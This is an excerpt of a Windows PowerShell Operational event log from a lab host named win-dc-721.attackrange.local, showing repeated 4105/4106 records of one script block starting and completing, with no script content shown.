Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468319
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468318
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468317
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468316
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468315
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468314
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468313
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468312
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468311
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468310
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468309
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468308
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468307
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468306
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468305
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468304
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468303
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468302
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468301
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468300
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468299
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468298
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468297
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468296
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468295
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468294
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468293
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468292
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468291
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468290
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468289
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468288
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468287
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468286
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468285
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468284
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468283
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468282
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468281
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468280
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468279
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468278
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468277
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468276
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468275
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468274
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468273
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468272
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468271
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468270
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468269
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468268
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468267
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468266
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468265
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
